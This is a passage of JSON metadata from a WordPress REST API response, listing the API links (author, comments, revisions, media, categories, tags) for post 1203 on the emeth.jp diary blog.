,"href":"https:\/\/emeth.jp\/diary\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/emeth.jp\/diary\/wp-json\/wp\/v2\/comments?post=1203"}],"version-history":[{"count":5,"href":"https:\/\/emeth.jp\/diary\/wp-json\/wp\/v2\/posts\/1203\/revisions"}],"predecessor-version":[{"id":1229,"href":"https:\/\/emeth.jp\/diary\/wp-json\/wp\/v2\/posts\/1203\/revisions\/1229"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/emeth.jp\/diary\/wp-json\/wp\/v2\/media\/1228"}],"wp:attachment":[{"href":"https:\/\/emeth.jp\/diary\/wp-json\/wp\/v2\/media?parent=1203"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/emeth.jp\/diary\/wp-json\/wp\/v2\/categories?post=1203"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/emeth.jp\/diary\/wp-json\/wp\/v2\/tags?post=1203"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}